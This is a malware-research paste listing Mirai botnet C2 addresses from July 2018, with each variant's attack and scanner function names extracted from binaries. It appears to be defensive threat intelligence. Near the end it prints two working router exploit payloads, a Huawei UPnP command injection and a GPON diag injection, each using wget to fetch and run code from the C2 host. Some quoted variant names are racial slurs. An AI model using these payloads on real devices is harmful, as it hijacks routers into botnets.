MalwareMustDie

Mirai functions July 2018

Jul 21st, 2018
  1. # This is a list of Mirai C2s and panels, with the attack
  2. # functions of their current setup, as hardcoded in the compiled binary,
  3. # collected in July 2018 by:
  4. # MalwareMustDie, NPO - @unixfreaxjp
  5. # This list was created with r2pipe, from r2 (rada.re)!
  6.  
  7.  
  8. Jul  1 00:52 C2: 167.99.204.242 type: katrina
  9. attack_method.c
  10. attack_method_greeth
  11. attack_method_greip
  12. attack_method_std
  13. attack_method_tcpack
  14. attack_method_tcpstomp
  15. attack_method_tcpsyn
  16. attack_method_tcpxmas
  17. attack_method_udpdns
  18. attack_method_udpgeneric
  19. attack_method_udpplain
  20. attack_method_udpvse
  21. scanner_init
  22. scanner_pid
  23. scanner_rawpkt
  24.  
  25. Jul  4 08:21 C2: 178.128.148.138 type: sora
  26. attack_method.c
  27. attack_method_greeth
  28. attack_method_greip
  29. attack_method_std
  30. attack_method_tcpack
  31. attack_method_tcpstomp
  32. attack_method_tcpsyn
  33. attack_method_tcpxmas
  34. attack_method_udpdns
  35. attack_method_udpgeneric
  36. attack_method_udpplain
  37. attack_method_udpvse
  38. scanner_init
  39. scanner_pid
  40. scanner_rawpkt
  41.  
  42. Jul  2 10:45 C2: 46.101.250.158 type: AB4g5/Josho
  43. attack_method.c
  44. attack_method_greeth
  45. attack_method_greip
  46. attack_method_std
  47. attack_method_tcpack
  48. attack_method_tcpstomp
  49. attack_method_tcpsyn
  50. attack_method_tcpxmas
  51. attack_method_udpdns
  52. attack_method_udpgeneric
  53. attack_method_udpplain
  54. attack_method_udpvse
  55. scanner_init
  56. scanner_pid
  57. scanner_rawpkt
  58.  
  59. Jul  4 01:45 C2: 46.101.250.158 type: Josho
  60. attack_method.c
  61. attack_method_greeth
  62. attack_method_greip
  63. attack_method_std
  64. attack_method_tcpack
  65. attack_method_tcpstomp
  66. attack_method_tcpsyn
  67. attack_method_tcpxmas
  68. attack_method_udpdns
  69. attack_method_udpgeneric
  70. attack_method_udpplain
  71. attack_method_udpvse
  72. scanner_init
  73. scanner_pid
  74. scanner_rawpkt
  75.  
  76. Jul  2 07:35 C2: 185.244.25.138 type: iloveniggers69/Omni
  77. attack_method.c
  78. attack_method_greeth
  79. attack_method_greip
  80. attack_method_std
  81. attack_method_tcpack
  82. attack_method_tcpstomp
  83. attack_method_tcpsyn
  84. attack_method_tcpxmas
  85. attack_method_udpdns
  86. attack_method_udpgeneric
  87. attack_method_udpplain
  88. attack_method_udpvse
  89. scanner_init
  90. scanner_pid
  91. scanner_rawpkt
  92.  
  93. Jul  3 09:01 C2: 217.61.97.186 type: original
  94. scanner.c
  95. attack_method.c
  96. attack_method_asyn
  97. attack_method_cfnull
  98. attack_method_greip
  99. attack_method_http
  100. attack_method_std
  101. attack_method_tcpack
  102. attack_method_tcpall
  103. attack_method_tcpfrag
  104. attack_method_tcpsyn
  105. attack_method_tcpusyn
  106. attack_method_udpgame
  107. attack_method_udpplain
  108.  
  109. Jul  3 09:01 C2: 217.61.97.186 type: kaizen
  110. attack_method.c
  111. attack_method_asyn
  112. attack_method_cfnull
  113. attack_method_greip
  114. attack_method_http
  115. attack_method_std
  116. attack_method_tcpack
  117. attack_method_tcpall
  118. attack_method_tcpfrag
  119. attack_method_tcpsyn
  120. attack_method_tcpusyn
  121. attack_method_udpgame
  122. attack_method_udpplain
  123. scanner_init
  124. scanner_kill
  125. scanner_pid
  126. scanner_rawpkt
  127.  
  128. Jul  3 09:01 C2: 217.61.97.186 type: original
  129. attack_method.c
  130. attack_method_asyn
  131. attack_method_cfnull
  132. attack_method_greip
  133. attack_method_http
  134. attack_method_std
  135. attack_method_tcpack
  136. attack_method_tcpall
  137. attack_method_tcpfrag
  138. attack_method_tcpsyn
  139. attack_method_tcpusyn
  140. attack_method_udpgame
  141. attack_method_udpplain
  142. scanner_init
  143. scanner_kill
  144. scanner_pid
  145. scanner_rawpkt
  146.  
  147. Jul  6 22:53 C2: 217.61.97.186 type: sora
  148. attack_method.c
  149. attack_method_greeth
  150. attack_method_greip
  151. attack_method_std
  152. attack_method_tcpack
  153. attack_method_tcpstomp
  154. attack_method_tcpsyn
  155. attack_method_tcpxmas
  156. attack_method_udpdns
  157. attack_method_udpgeneric
  158. attack_method_udpplain
  159. attack_method_udpvse
  160. scanner_init
  161. scanner_pid
  162. scanner_rawpkt
  163.  
  164. Jul  3 05:38 C2: 80.211.87.122 type: sora
  165. attack_method.c
  166. attack_method_greeth
  167. attack_method_greip
  168. attack_method_std
  169. attack_method_tcpack
  170. attack_method_tcpstomp
  171. attack_method_tcpsyn
  172. attack_method_tcpxmas
  173. attack_method_udpdns
  174. attack_method_udpgeneric
  175. attack_method_udpplain
  176. attack_method_udpvse
  177. scanner_init
  178. scanner_pid
  179. scanner_rawpkt
  180.  
  181. Jul  4 21:45 C2: 209.97.138.162 type: neurosis
  182. attack_method.c
  183. telnet_scanner.c
  184. attack_method_greeth
  185. attack_method_greip
  186. attack_method_std
  187. attack_method_tcpack
  188. attack_method_tcpstomp
  189. attack_method_tcpsyn
  190. attack_method_tcpxmas
  191. attack_method_udpdns
  192. attack_method_udpgeneric
  193. attack_method_udpplain
  194. attack_method_udpvse
  195. scanner_init
  196. scanner_pid
  197. scanner_rawpkt
  198.  
  199.  
  200. Jul  7 07:59 C2: 209.97.138.162 type: nigger
  201. attack_method.c
  202. attack_method_greeth
  203. attack_method_greip
  204. attack_method_std
  205. attack_method_tcpack
  206. attack_method_tcpstomp
  207. attack_method_tcpsyn
  208. attack_method_tcpxmas
  209. attack_method_udpdns
  210. attack_method_udpgeneric
  211. attack_method_udpplain
  212. attack_method_udpvse
  213. scanner_init
  214. scanner_kill
  215. scanner_pid
  216. scanner_rawpkt
  217.  
  218. Jul  7 07:59 C2: 209.97.138.162 type: exploit
  219. ascii scanner.c
  220. attack_method.c
  221. attack_method_greeth
  222. attack_method_greip
  223. attack_method_std
  224. attack_method_tcpack
  225. attack_method_tcpstomp
  226. attack_method_tcpsyn
  227. attack_method_tcpxmas
  228. attack_method_udpdns
  229. attack_method_udpgeneric
  230. attack_method_udpplain
  231. attack_method_udpvse
  232.  
  233. Jun 30 15:24 C2: 159.65.235.46 type: Josho
  234. attack_method.c
  235. attack_method_greeth
  236. attack_method_greip
  237. attack_method_std
  238. attack_method_tcpack
  239. attack_method_tcpstomp
  240. attack_method_tcpsyn
  241. attack_method_tcpxmas
  242. attack_method_udpdns
  243. attack_method_udpgeneric
  244. attack_method_udpplain
  245. attack_method_udpvse
  246. scanner_init
  247. scanner_pid
  248. scanner_rawpkt
  249.  
  250. Jul  1 00:24 C2: 159.65.235.46 type: AB4g5/Josho
  251. attack_method.c
  252. attack_method_greeth
  253. attack_method_greip
  254. attack_method_std
  255. attack_method_tcpack
  256. attack_method_tcpstomp
  257. attack_method_tcpsyn
  258. attack_method_tcpxmas
  259. attack_method_udpdns
  260. attack_method_udpgeneric
  261. attack_method_udpplain
  262. attack_method_udpvse
  263. scanner_init
  264. scanner_pid
  265. scanner_rawpkt
  266.  
  267. Jul  6 00:10 C2: 206.189.163.167 type: AB4g5/Josho
  268. attack_method.c
  269. attack_method_greeth
  270. attack_method_greip
  271. attack_method_std
  272. attack_method_tcpack
  273. attack_method_tcpstomp
  274. attack_method_tcpsyn
  275. attack_method_tcpxmas
  276. attack_method_udpdns
  277. attack_method_udpgeneric
  278. attack_method_udpplain
  279. attack_method_udpvse
  280. scanner_init
  281. scanner_pid
  282. scanner_rawpkt
  283.  
  284. Jul  7 00:42 C2: 185.244.25.133 type: sora
  285. attack_method.c
  286. attack_method_greeth
  287. attack_method_greip
  288. attack_method_std
  289. attack_method_tcpack
  290. attack_method_tcpstomp
  291. attack_method_tcpsyn
  292. attack_method_tcpxmas
  293. attack_method_udpdns
  294. attack_method_udpgeneric
  295. attack_method_udpplain
  296. attack_method_udpvse
  297. scanner_init
  298. scanner_pid
  299. scanner_rawpkt
  300.  
  301. Jul  6 01:03 C2: 217.61.120.199 type: sora
  302. attack.c
  303. attack_app.c
  304. attack_gre.c
  305. attack_tcp.c
  306. attack_udp.c
  307. attack_app_http
  308. attack_gre_eth
  309. attack_gre_ip
  310. attack_tcp_ack
  311. attack_tcp_stomp
  312. attack_tcp_syn
  313. attack_udp_generic
  314. attack_udp_plain
  315. attack_udp_vse
  316. attack_udp_dns
  317. scanner_init
  318. scanner_pid
  319. scanner_rawpkt
  320.  
  321. Jul  6 02:18 C2: 206.189.209.111 type: sora
  322. attack.c
  323. attack_app.c
  324. attack_gre.c
  325. attack_tcp.c
  326. attack_udp.c
  327. attack_app_http
  328. attack_gre_eth
  329. attack_gre_ip
  330. attack_tcp_ack
  331. attack_tcp_stomp
  332. attack_tcp_syn
  333. attack_udp_generic
  334. attack_udp_plain
  335. attack_udp_vse
  336. attack_udp_dns
  337. scanner_init
  338. scanner_pid
  339. scanner_rawpkt
  340.  
  341. Jul  4 04:17 C2: 159.89.230.82 type: Josho
  342. attack_method.c
  343. attack_method_greeth
  344. attack_method_greip
  345. attack_method_std
  346. attack_method_tcpack
  347. attack_method_tcpstomp
  348. attack_method_tcpsyn
  349. attack_method_tcpxmas
  350. attack_method_udpdns
  351. attack_method_udpgeneric
  352. attack_method_udpplain
  353. attack_method_udpvse
  354. scanner_init
  355. scanner_pid
  356. scanner_rawpkt
  357.  
  358. Jul  4 01:24 C2: 80.211.89.251 type: sora
  359. attack.c
  360. attack_app.c
  361. attack_gre.c
  362. attack_tcp.c
  363. attack_udp.c
  364. attack_app_http
  365. attack_gre_eth
  366. attack_gre_ip
  367. attack_tcp_ack
  368. attack_tcp_stomp
  369. attack_tcp_syn
  370. attack_udp_generic
  371. attack_udp_plain
  372. attack_udp_vse
  373. attack_udp_dns
  374. scanner_init
  375. scanner_pid
  376. scanner_rawpkt
  377.  
  378. Jul  5 20:42 C2: 51.15.193.249 type: kek
  379. attack_method.c
  380. attack_method_greeth
  381. attack_method_greip
  382. attack_method_std
  383. attack_method_tcpack
  384. attack_method_tcpstomp
  385. attack_method_tcpsyn
  386. attack_method_tcpxmas
  387. attack_method_udpdns
  388. attack_method_udpgeneric
  389. attack_method_udpplain
  390. attack_method_udpvse
  391. scanner_init
  392. scanner_pid
  393. scanner_rawpkt
  394.  
  395. Jul  4 01:17 C2: 80.252.107.183 type: owari
  396. attack_method.c
  397. attack_method_greeth
  398. attack_method_greip
  399. attack_method_std
  400. attack_method_tcpack
  401. attack_method_tcpstomp
  402. attack_method_tcpsyn
  403. attack_method_tcpxmas
  404. attack_method_udpdns
  405. attack_method_udpgeneric
  406. attack_method_udpplain
  407. attack_method_udpvse
  408. scanner_init
  409. scanner_pid
  410. scanner_rawpkt
  411.  
  412. Jul  4 10:29 C2: 165.227.115.67 type: AB4g5/Cult
  413. attack_method.c
  414. attack_method_greeth
  415. attack_method_greip
  416. attack_method_std
  417. attack_method_tcpack
  418. attack_method_tcpstomp
  419. attack_method_tcpsyn
  420. attack_method_tcpxmas
  421. attack_method_udpdns
  422. attack_method_udpgeneric
  423. attack_method_udpplain
  424. attack_method_udpvse
  425. scanner_init
  426. scanner_pid
  427. scanner_rawpkt
  428.  
  429. Jul  4 01:29 C2: 165.227.115.67 type: Cult
  430. attack_method.c
  431. attack_method_greeth
  432. attack_method_greip
  433. attack_method_std
  434. attack_method_tcpack
  435. attack_method_tcpstomp
  436. attack_method_tcpsyn
  437. attack_method_tcpxmas
  438. attack_method_udpdns
  439. attack_method_udpgeneric
  440. attack_method_udpplain
  441. attack_method_udpvse
  442. scanner_init
  443. scanner_pid
  444. scanner_rawpkt
  445.  
  446. Jul  3 22:34 C2: 165.227.102.171 type: sora
  447. attack_method.c
  448. attack_method_greeth
  449. attack_method_greip
  450. attack_method_std
  451. attack_method_tcpack
  452. attack_method_tcpstomp
  453. attack_method_tcpsyn
  454. attack_method_tcpxmas
  455. attack_method_udpdns
  456. attack_method_udpgeneric
  457. attack_method_udpplain
  458. attack_method_udpvse
  459. scanner_init
  460. scanner_pid
  461. scanner_rawpkt
  462.  
  463. Jul  2 19:20 C2: 178.128.248.1 type: sora
  464. attack_method.c
  465. attack_method_greeth
  466. attack_method_greip
  467. attack_method_std
  468. attack_method_tcpack
  469. attack_method_tcpstomp
  470. attack_method_tcpsyn
  471. attack_method_tcpxmas
  472. attack_method_udpdns
  473. attack_method_udpgeneric
  474. attack_method_udpplain
  475. attack_method_udpvse
  476. scanner_init
  477. scanner_pid
  478. scanner_rawpkt
  479.  
  480. Jun 27 06:43 C2: 167.99.146.93 type: Josho
  481. attack_method.c
  482. attack_method_greeth
  483. attack_method_greip
  484. attack_method_std
  485. attack_method_tcpack
  486. attack_method_tcpstomp
  487. attack_method_tcpsyn
  488. attack_method_tcpxmas
  489. attack_method_udpdns
  490. attack_method_udpgeneric
  491. attack_method_udpplain
  492. attack_method_udpvse
  493. scanner_init
  494. scanner_pid
  495. scanner_rawpkt
  496.  
  497. Jul  6 00:25 C2: 80.211.41.101 type: sora
  498. attack.c
  499. attack_app.c
  500. attack_gre.c
  501. attack_tcp.c
  502. attack_udp.c
  503. attack_app_http
  504. attack_gre_eth
  505. attack_gre_ip
  506. attack_tcp_ack
  507. attack_tcp_stomp
  508. attack_tcp_syn
  509. attack_udp_generic
  510. attack_udp_plain
  511. attack_udp_vse
  512. attack_udp_dns
  513. scanner_init
  514. scanner_pid
  515. scanner_rawpkt
  516.  
  517. Jul 12 00:36 C2: 80.211.146.193 type: Josho
  518. attack_method.c
  519. attack_method_greeth
  520. attack_method_greip
  521. attack_method_std
  522. attack_method_tcpack
  523. attack_method_tcpstomp
  524. attack_method_tcpsyn
  525. attack_method_tcpxmas
  526. attack_method_udpdns
  527. attack_method_udpgeneric
  528. attack_method_udpplain
  529. attack_method_udpvse
  530. scanner_init
  531. scanner_pid
  532. scanner_rawpkt
  533.  
  534. Jul 12 09:36 C2: 80.211.146.193 type: AB4g5/Josho
  535. attack_method.c
  536. attack_method_greeth
  537. attack_method_greip
  538. attack_method_std
  539. attack_method_tcpack
  540. attack_method_tcpstomp
  541. attack_method_tcpsyn
  542. attack_method_tcpxmas
  543. attack_method_udpdns
  544. attack_method_udpgeneric
  545. attack_method_udpplain
  546. attack_method_udpvse
  547. scanner_init
  548. scanner_pid
  549. scanner_rawpkt
  550.  
  551. Jul  8 06:19 C2: 176.107.130.143 type: sora
  552. attack.c
  553. attack_app.c
  554. attack_gre.c
  555. attack_tcp.c
  556. attack_udp.c
  557. attack_app_http
  558. attack_gre_eth
  559. attack_gre_ip
  560. attack_tcp_ack
  561. attack_tcp_stomp
  562. attack_tcp_syn
  563. attack_udp_generic
  564. attack_udp_plain
  565. attack_udp_vse
  566. attack_udp_dns
  567. scanner_init
  568. scanner_pid
  569. scanner_rawpkt
  570.  
  571. Jul  8 22:01 C2: 159.65.81.70 type: sora
  572. attack.c
  573. attack_app.c
  574. attack_gre.c
  575. attack_tcp.c
  576. attack_udp.c
  577. attack_app_http
  578. attack_gre_eth
  579. attack_gre_ip
  580. attack_tcp_ack
  581. attack_tcp_stomp
  582. attack_tcp_syn
  583. attack_udp_generic
  584. attack_udp_plain
  585. attack_udp_vse
  586. attack_udp_dns
  587. scanner_init
  588. scanner_pid
  589. scanner_rawpkt
  590.  
  591. Jul  2 13:01 C2: 94.177.253.18 type: sora
  592. attack_method.c
  593. attack_method_greeth
  594. attack_method_greip
  595. attack_method_std
  596. attack_method_tcpack
  597. attack_method_tcpstomp
  598. attack_method_tcpsyn
  599. attack_method_tcpxmas
  600. attack_method_udpdns
  601. attack_method_udpgeneric
  602. attack_method_udpplain
  603. attack_method_udpvse
  604. scanner_init
  605. scanner_pid
  606. scanner_rawpkt
  607.  
  608. Jul 10 09:12 C2: 51.15.195.195 type: dek
  609. attack_method.c
  610. attack_method_greeth
  611. attack_method_greip
  612. attack_method_std
  613. attack_method_tcpack
  614. attack_method_tcpstomp
  615. attack_method_tcpsyn
  616. attack_method_tcpxmas
  617. attack_method_udpdns
  618. attack_method_udpgeneric
  619. attack_method_udpplain
  620. attack_method_udpvse
  621. scanner_init
  622. scanner_pid
  623. scanner_rawpkt
  624.  
  625. Jul 12 14:37 C2: 178.128.163.237 type: sora
  626. attack_method.c
  627. attack_method_greeth
  628. attack_method_greip
  629. attack_method_std
  630. attack_method_tcpack
  631. attack_method_tcpstomp
  632. attack_method_tcpsyn
  633. attack_method_tcpxmas
  634. attack_method_udpdns
  635. attack_method_udpgeneric
  636. attack_method_udpplain
  637. attack_method_udpvse
  638. scanner_init
  639. scanner_pid
  640. scanner_rawpkt
  641.  
  642. Jul 11 07:22 C2: 178.132.201.154 type: original
  643. ascii scanner.c
  644. attack_method.c
  645. attack_method_asyn
  646. attack_method_cfnull
  647. attack_method_greip
  648. attack_method_http
  649. attack_method_std
  650. attack_method_tcpack
  651. attack_method_tcpall
  652. attack_method_tcpfrag
  653. attack_method_tcpsyn
  654. attack_method_tcpusyn
  655. attack_method_udpgame
  656. attack_method_udpplain
  657. scanner_kill
  658. scanner_init
  659. scanner_pid
  660. scanner_rawpkt
  661.  
  662. Jul 11 07:23 C2: 178.132.201.154 type: kaizen
  663. attack_method.c
  664. attack_method_asyn
  665. attack_method_cfnull
  666. attack_method_greip
  667. attack_method_http
  668. attack_method_std
  669. attack_method_tcpack
  670. attack_method_tcpall
  671. attack_method_tcpfrag
  672. attack_method_tcpsyn
  673. attack_method_tcpusyn
  674. attack_method_udpgame
  675. attack_method_udpplain
  676. scanner_init
  677. scanner_kill
  678. scanner_pid
  679. scanner_rawpkt
  680.  
  681. Jul 11 07:23 C2: 178.132.201.154 type: original
  682. attack_method.c
  683. attack_method_asyn
  684. attack_method_cfnull
  685. attack_method_greip
  686. attack_method_http
  687. attack_method_std
  688. attack_method_tcpack
  689. attack_method_tcpall
  690. attack_method_tcpfrag
  691. attack_method_tcpsyn
  692. attack_method_tcpusyn
  693. attack_method_udpgame
  694. attack_method_udpplain
  695. scanner_init
  696. scanner_kill
  697. scanner_pid
  698. scanner_rawpkt
  699.  
  700. Jul 10 20:21 C2: 80.211.175.27 type: AB4g5/Josho
  701. attack_method.c
  702. attack_method_greeth
  703. attack_method_greip
  704. attack_method_std
  705. attack_method_tcpack
  706. attack_method_tcpstomp
  707. attack_method_tcpsyn
  708. attack_method_tcpxmas
  709. attack_method_udpdns
  710. attack_method_udpgeneric
  711. attack_method_udpplain
  712. attack_method_udpvse
  713. scanner_init
  714. scanner_pid
  715. scanner_rawpkt
  716.  
  717. Jul 13 14:00 C2: 139.59.2.118 type: AB4g5/Josho
  718. attack_method.c
  719. attack_method_greeth
  720. attack_method_greip
  721. attack_method_std
  722. attack_method_tcpack
  723. attack_method_tcpstomp
  724. attack_method_tcpsyn
  725. attack_method_tcpxmas
  726. attack_method_udpdns
  727. attack_method_udpgeneric
  728. attack_method_udpplain
  729. attack_method_udpvse
  730. scanner_init
  731. scanner_pid
  732. scanner_rawpkt
  733.  
  734. Jul 11 11:48 C2: 178.128.15.245 type: AB4g5/Josho
  735. attack_method.c
  736. attack_method_greeth
  737. attack_method_greip
  738. attack_method_std
  739. attack_method_tcpack
  740. attack_method_tcpstomp
  741. attack_method_tcpsyn
  742. attack_method_tcpxmas
  743. attack_method_udpdns
  744. attack_method_udpgeneric
  745. attack_method_udpplain
  746. attack_method_udpvse
  747. scanner_init
  748. scanner_pid
  749. scanner_rawpkt
  750.  
  751. Jul 13 13:41 C2: 80.211.82.44 type: sora
  752. attack_method.c
  753. attack_method_greeth
  754. attack_method_greip
  755. attack_method_std
  756. attack_method_tcpack
  757. attack_method_tcpstomp
  758. attack_method_tcpsyn
  759. attack_method_tcpxmas
  760. attack_method_udpdns
  761. attack_method_udpgeneric
  762. attack_method_udpplain
  763. attack_method_udpvse
  764. scanner_init
  765. scanner_pid
  766. scanner_rawpkt
  767.  
  768. Jul 12 09:19 C2: 185.244.25.150 type: AB4g5/Cult
  769. attack_method.c
  770. attack_method_greeth
  771. attack_method_greip
  772. attack_method_std
  773. attack_method_tcpack
  774. attack_method_tcpstomp
  775. attack_method_tcpsyn
  776. attack_method_tcpxmas
  777. attack_method_udpdns
  778. attack_method_udpgeneric
  779. attack_method_udpplain
  780. attack_method_udpvse
  781. scanner_init
  782. scanner_pid
  783. scanner_rawpkt
  784.  
  785. Jul 10 06:49 C2: 167.99.164.53 type: sora
  786. attack_method.c
  787. attack_method_greeth
  788. attack_method_greip
  789. attack_method_std
  790. attack_method_tcpack
  791. attack_method_tcpstomp
  792. attack_method_tcpsyn
  793. attack_method_tcpxmas
  794. attack_method_udpdns
  795. attack_method_udpgeneric
  796. attack_method_udpplain
  797. attack_method_udpvse
  798. scanner_init
  799. scanner_pid
  800. scanner_rawpkt
  801.  
  802. Jul 13 08:31 C2: 94.177.214.233 type: sora
  803. attack_method.c
  804. attack_method_greeth
  805. attack_method_greip
  806. attack_method_std
  807. attack_method_tcpack
  808. attack_method_tcpstomp
  809. attack_method_tcpsyn
  810. attack_method_tcpxmas
  811. attack_method_udpdns
  812. attack_method_udpgeneric
  813. attack_method_udpplain
  814. attack_method_udpvse
  815. scanner_init
  816. scanner_pid
  817. scanner_rawpkt
  818.  
  819. Jul 13 09:19 C2: 159.89.189.233 type: AB4g5/Josho
  820. attack_method.c
  821. attack_method_greeth
  822. attack_method_greip
  823. attack_method_std
  824. attack_method_tcpack
  825. attack_method_tcpstomp
  826. attack_method_tcpsyn
  827. attack_method_tcpxmas
  828. attack_method_udpdns
  829. attack_method_udpgeneric
  830. attack_method_udpplain
  831. attack_method_udpvse
  832. scanner_init
  833. scanner_pid
  834. scanner_rawpkt
  835.  
  836. Jul 13 19:39 C2: 159.89.16.26 type: sora
  837. attack_method.c
  838. attack_method_greeth
  839. attack_method_greip
  840. attack_method_std
  841. attack_method_tcpack
  842. attack_method_tcpstomp
  843. attack_method_tcpsyn
  844. attack_method_tcpxmas
  845. attack_method_udpdns
  846. attack_method_udpgeneric
  847. attack_method_udpplain
  848. attack_method_udpvse
  849. scanner_init
  850. scanner_pid
  851. scanner_rawpkt
  852.  
  853. Jul 15 03:51 C2: 178.128.79.94 type: Josho
  854. attack_method.c
  855. attack_method_greeth
  856. attack_method_greip
  857. attack_method_std
  858. attack_method_tcpack
  859. attack_method_tcpstomp
  860. attack_method_tcpsyn
  861. attack_method_tcpxmas
  862. attack_method_udpdns
  863. attack_method_udpgeneric
  864. attack_method_udpplain
  865. attack_method_udpvse
  866. scanner_init
  867. scanner_pid
  868. scanner_rawpkt
  869.  
  870. Jul 15 12:51 C2: 178.128.79.94 type: AB4g5/Josho
  871. attack_method.c
  872. attack_method_greeth
  873. attack_method_greip
  874. attack_method_std
  875. attack_method_tcpack
  876. attack_method_tcpstomp
  877. attack_method_tcpsyn
  878. attack_method_tcpxmas
  879. attack_method_udpdns
  880. attack_method_udpgeneric
  881. attack_method_udpplain
  882. attack_method_udpvse
  883. scanner_init
  884. scanner_pid
  885. scanner_rawpkt
  886.  
  887. Jul 16 06:54 C2: 167.99.153.91 type: sora
  888. attack_method.c
  889. attack_method_greeth
  890. attack_method_greip
  891. attack_method_std
  892. attack_method_tcpack
  893. attack_method_tcpstomp
  894. attack_method_tcpsyn
  895. attack_method_tcpxmas
  896. attack_method_udpdns
  897. attack_method_udpgeneric
  898. attack_method_udpplain
  899. attack_method_udpvse
  900. scanner_init
  901. scanner_pid
  902. scanner_rawpkt
  903.  
  904. Jul 16 06:56 C2: 178.128.39.135 type: sora
  905. attack_method.c
  906. attack_method_greeth
  907. attack_method_greip
  908. attack_method_std
  909. attack_method_tcpack
  910. attack_method_tcpstomp
  911. attack_method_tcpsyn
  912. attack_method_tcpxmas
  913. attack_method_udpdns
  914. attack_method_udpgeneric
  915. attack_method_udpplain
  916. attack_method_udpvse
  917. scanner_init
  918. scanner_pid
  919. scanner_rawpkt
  920.  
  921. Jul 16 03:43 C2: 159.65.196.137 type: sora
  922. attack_method.c
  923. attack_method_greeth
  924. attack_method_greip
  925. attack_method_std
  926. attack_method_tcpack
  927. attack_method_tcpstomp
  928. attack_method_tcpsyn
  929. attack_method_tcpxmas
  930. attack_method_udpdns
  931. attack_method_udpgeneric
  932. attack_method_udpplain
  933. attack_method_udpvse
  934. scanner_init
  935. scanner_pid
  936. scanner_rawpkt
  937.  
  938. Jul 15 11:46 C2: 178.132.201.156 type: sora
  939. attack_method.c
  940. attack_method_greeth
  941. attack_method_greip
  942. attack_method_std
  943. attack_method_tcpack
  944. attack_method_tcpstomp
  945. attack_method_tcpsyn
  946. attack_method_tcpxmas
  947. attack_method_udpdns
  948. attack_method_udpgeneric
  949. attack_method_udpplain
  950. attack_method_udpvse
  951. scanner_init
  952. scanner_pid
  953. scanner_rawpkt
  954.  
  955. Jul 16 06:23 C2: 178.128.68.128 type: sora
  956. attack_method.c
  957. attack_method_greeth
  958. attack_method_greip
  959. attack_method_std
  960. attack_method_tcpack
  961. attack_method_tcpstomp
  962. attack_method_tcpsyn
  963. attack_method_tcpxmas
  964. attack_method_udpdns
  965. attack_method_udpgeneric
  966. attack_method_udpplain
  967. attack_method_udpvse
  968. scanner_init
  969. scanner_pid
  970. scanner_rawpkt
  971.  
  972. Jul 11 14:35 C2: 178.128.42.229 type: sora
  973. attack_method.c
  974. attack_method_greeth
  975. attack_method_greip
  976. attack_method_std
  977. attack_method_tcpack
  978. attack_method_tcpstomp
  979. attack_method_tcpsyn
  980. attack_method_tcpxmas
  981. attack_method_udpdns
  982. attack_method_udpgeneric
  983. attack_method_udpplain
  984. attack_method_udpvse
  985. scanner_init
  986. scanner_pid
  987. scanner_rawpkt
  988.  
  989. Jul 14 17:48 C2: 204.48.30.214 type: AB4g5/Josho
  990. attack_method.c
  991. attack_method_greeth
  992. attack_method_greip
  993. attack_method_std
  994. attack_method_tcpack
  995. attack_method_tcpstomp
  996. attack_method_tcpsyn
  997. attack_method_tcpxmas
  998. attack_method_udpdns
  999. attack_method_udpgeneric
  1000. attack_method_udpplain
  1001. attack_method_udpvse
  1002. scanner_init
  1003. scanner_pid
  1004. scanner_rawpkt
  1005.  
  1006. Jul 21 11:38 C2: 104.244.72.82 type: sister "custom"
  1007. attack_gre.c
  1008. attack_tcp.c
  1009. attack_udp.c
  1010. dlink_scanner.c
  1011. gpon_scanner.c
  1012. huawei_scanner.c
  1013. attack_gre_eth
  1014. attack_gre_ip
  1015. attack_tcp_ack
  1016. attack_tcp_stomp
  1017. attack_tcp_syn
  1018. attack_udp_dns
  1019. attack_udp_generic
  1020. attack_udp_plain
  1021. attack_udp_vse
  1022. dlinkscanner_fake_time
  1023. dlinkscanner_rsck
  1024. dlinkscanner_scanner_init
  1025. dlinkscanner_scanner_kill
  1026. dlinkscanner_scanner_pid
  1027. dlinkscanner_scanner_rawpkt
  1028. dlinkscanner_setup_connection
  1029. gponscanner_fake_time
  1030. gponscanner_rsck
  1031. gponscanner_scanner_init
  1032. gponscanner_scanner_kill
  1033. gponscanner_scanner_pid
  1034. gponscanner_scanner_rawpkt
  1035. gponscanner_setup_connection
  1036. huaweiscanner_fake_time
  1037. huaweiscanner_rsck
  1038. huaweiscanner_scanner_init
  1039. huaweiscanner_scanner_kill
  1040. huaweiscanner_scanner_pid
  1041. huaweiscanner_scanner_rawpkt
  1042. huaweiscanner_setup_connection
  1043. :
  1044. HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.244.72.82 -l /tmp/dgoct -r /huawei; /bin/busybox chmod 777 * /tmp/dgoct; /tmp/dgoct huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n
  1045. HTTP/1.1\r\nUser-Agent: Hello, World\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.72.82/gpon+-O+/tmp/pyx;sh+/tmp/pyx`&ipv=0\r\n\r\n
  1046.  
  1047. Jul 14 21:52 C2: 46.243.189.109 type: sister
  1048. attack.c
  1049. attack_gre.c
  1050. attack_tcp.c
  1051. attack_udp.c
  1052. attack_gre_eth
  1053. attack_udp_generic
  1054. attack_udp_plain
  1055. attack_udp_vse
  1056. attack_tcp_ack
  1057. attack_tcp_stomp
  1058. attack_udp_dns
  1059. attack_tcp_syn
  1060. attack_gre_ip
  1061. scanner_kill
  1062. scanner_init
  1063. scanner_pid
  1064. scanner_rawpkt
  1065.  
  1066. [EOF] MMD